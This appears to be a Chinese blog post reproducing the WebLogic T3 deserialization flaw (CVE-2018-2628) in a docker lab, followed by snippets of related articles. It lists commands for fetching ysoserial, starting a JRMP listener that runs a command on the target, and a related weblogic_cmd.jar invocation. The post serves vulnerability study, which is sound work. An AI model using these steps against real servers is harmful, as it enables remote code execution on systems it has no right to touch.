rmi 反序列化漏洞_【漏洞复现】Weblogic反序列化漏洞(CVE-2018-2628)

最新推荐文章于 2021-12-22 10:01:29 发布
最新推荐文章于 2021-12-22 10:01:29 发布
阅读量118 收藏
点赞数
文章标签: rmi 反序列化漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39827905/article/details/113538990
版权

漏洞描述:

Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中, 并创建T3协议通信连接, 将流量传输到Java虚拟机. T3协议在开放WebLogic控制台端口的应用上默认开启. 攻击者可以通过T3协议发送恶意的的反序列化数据, 进行反序列化, 实现对存在漏洞的weblogic组件的远程代码执行攻击。

影响版本:

Oracle Weblogic Server10.3.6.0.0

Oracle Weblogic Server12.1.3.0.0

Oracle Weblogic Server12.2.1.2.0

Oracle Weblogic Server12.2.1.3.0

复现步骤:

1. 启动漏洞环境

命令:docker-compose up -d

2. 下载反序列化工具

命令:wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar

3. 启动JRMP Server,利用监听在连接成功后靶机上创建jadoreshell

命令:java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 8889 Jdk7u21 "touch /tmp/jadoreshell"

4. 使用ysoserial-0.1-cve-2018-2628-all.jar工具生成一个payload字符串,因为要实现Weblogic远程调用攻击机主机上的方法。就需要知道远程方法所在的主机地址和端口号。所以在上一步要记录攻击主机的信息。

5. 替换脚本里的payload以及目标IP地址

6. 执行python脚本

7. 查看是否写入文本文件

命令:dockers ps

命令:docker exec -ti cve-2018-2628_weblogic_1 /bin/bash

命令:ls -al /tmp

文件写入成功

产品解决与支持:

华云安灵洞®威胁与漏洞管理平台(Ai.Vul)已经支持一键检测该漏洞。

weixin_39827905
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JAVA序列漏洞浅析
谢公子的博客
12-20 9292
目录 序列漏洞 序列序列 JAVA WEB中的序列序列 对象序列序列范例 JAVA中执行系统命令 重写readObject()方法 Apache Commons Collections 序列漏洞payload JAVA Web序列漏洞的挖掘和利用 由于本人并非JAVA程序员,所以对JAVA方面的知识不是很懂,仅仅是能看懂而已。本文参照几位大佬...
【vulhub】WeblogicCVE-2018-2628)漏洞
qq_45300786的博客
04-10 2378
一、什么是WebLogic WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 先提几个概念 JRMP:java remote method protocol,Java远程方法协议 JRMP是的Java技术协议的具
Java RMI 序列漏洞-远程命令执行
tangshuangsss的专栏
12-22 2726
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介RMI即远程方法调用,通俗的来说就是客户端可以调用服务端的方法。和RPC差不多,RMI是java独立实的...
java射:2、什么是java序列?什么情况下需要序列
weixin_42924812的博客
11-23 658
文章目录什么是java序列什么情况下需要序列 什么是java序列 什么情况下需要序列
rmi序列导致rce漏洞_RMI序列漏洞分析
weixin_39710249的博客
12-23 441
RMI简介首先看一下RMI在wikipedia上的描述:Java远程方法调用,即JavaRMI(JavaRemote MethodInvocation)是Java编程语言里,一种用于实远程过程调用的应用程序编程接口。它使客户机上运行的程序可以调用远程服务器上的对象。远程方法调用特性使Java编程人员能够在网络环境中分布操作。RMI全部的宗旨就是尽可能简远程接口对象的使用。JavaRMI极大地依...
javaRMI序列漏洞验证工具
08-21
检测javaRMI序列漏洞
JAVA序列漏洞知识点整理
01-20
jenkins序列漏洞跟过一遍之后,虽说梳理清楚了漏洞触发的大体流程,但是对于JAVA序列漏洞导致代码执行的原理仍旧不懂,因此有必要整理JAVA序列漏洞相关的知识点。  JAVA序列漏洞  序列漏洞的...
WebLogic序列_CVE-2017-3248
09-06
WebLogic序列_CVE-2017-3248 java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001 工具使用方法: -B Runtime Blind Execute Command maybe you should select os type -C <arg> (执行命令)Execute ...
java_rmi漏洞利用工具
05-31
本项目使用socket直接发送数据包来攻击rmi,通过序列攻击rmi,双击直接运行,对1099端口的rmi服务直接进行漏洞检测。
weblogic 序列漏洞测试及破解方式
11-30
CommonsCollectionsTools.jar weblogic 序列 漏洞测试 破解方式
rmi 序列漏洞_Java安全之RMI序列
weixin_35374026的博客
01-13 1144
Java安全之RMI序列0x00 前言在分析Fastjson漏洞前,需要了解RMI机制和JNDI注入等知识点,所以本篇文来分析一下RMI机制。在Java里面简单来说使用Java调用远程Java程序使用的就是RMI,调用C的程序调用的是JNI,调用python程序使用到的是Jython。RMI、JNI、Jython,其实在安全中都能发挥比较大的作用。 JNI在安全里面的运用就比较大了,既然可以...
rmi 序列漏洞_写一个rmi序列工具
weixin_39997037的博客
01-07 2145
RMI(java 远程方法调用),RMI服务端和客户端之间通过序列对象进行传输,所以JDK8 U121之前的版本存在序列漏洞RMI和java序列原理就不详细介绍了。RMI序列利用成功的条件如下:1.能够进行rmi通信。2.JDK版本小于8.0.1213.引入存在序列链的库,以commons.collections为例的话,就需要其版本小于commons.collec...
JAVA RMI 序列远程命令执行漏洞
热门推荐
LeeHDsniper的博客
05-11 2万+
JAVA RMI 序列远程命令执行漏洞 漏洞资料 背景 原理 Payload构造 搭建本地测试环境 开启包含第三方库的RMI服务 测试RMI客户端 攻击测试 升级版攻击 Weblogic Commons-Collections序列RCE漏洞CVE-2015-4852JAVA RMI 序列远程命令执行漏洞漏洞资料Java RMI远程序列任意类及远程代码执行解析(CVE-2017-324
weblogic的JAVA序列漏洞的多种方法--预防GetShell攻击
既是过河之卒,惟有奋力向前。
06-15 1397
0x00 前言 目前oracle还没有在公开途径发布weblogic的JAVA序列漏洞的官方补丁,目前看到的修方法无非两条: 使用SerialKiller替换进行序列操作的ObjectInputStream类; 在不影响业务的情况下,临时删除掉项目里的 “org/apache/commons/collections/functors/InvokerTransformer.cl...
漏洞通告】Weblogic 序列远程代码执行高危漏洞 (CVE-2018-2628)
高效运维
04-20 4920
Oracle官方发布了4月份的关键补丁更新CPU(Critical Patch Update),其中包含一个高危的远程代码执行漏洞(CVE-2018-2628),通过该漏...
rmi远程代码执行漏洞_【最新漏洞简讯】WebLogic远程代码执行漏洞 (CVE202014645)
weixin_36028342的博客
01-05 113
↑ 点击上方“SecMind安全管家”关注我们情报编号:W1120200715漏洞概述WebLogic是Oracle公司出品的用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器,全球使用广泛。WebLogic的远程方法调用RMI通信使用T3协议,而T3协议与HTTP协议用7001端口,默认同时开启,即可被利用,由于漏洞利用杂度低,风险高,建...
序列漏洞
weixin_43271438的博客
10-08 2751
Weblogic序列漏洞 Java 提供了一种对象序列的机制,该机制中,一个对象可以被表示为一个字节序列,该字节序列包括该对象的数据、有关对象的类型的信息和存储在对象中数据的类型。 将序列对象写入文件之后,可以从文件中读取出来,并且对它进行序列,也就是说,对象的类型信息、对象的数据,还有对象中的数据类型可以用来在内存中新建对象。 整个过程都是 Java 虚拟机(JVM)独立的,也就是说...
java rmi registry 序列漏洞(<jdk8u232_b09)
最新发布
12-14
Java RMI Registry序列漏洞是指在JDK 8u232_b09(以及之前的版本)中存在一个漏洞,导致攻击者可以利用该漏洞在目标系统上执行任意代码。 要这个漏洞,可以按照以下步骤进行: 1. 准备环境:首先,需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值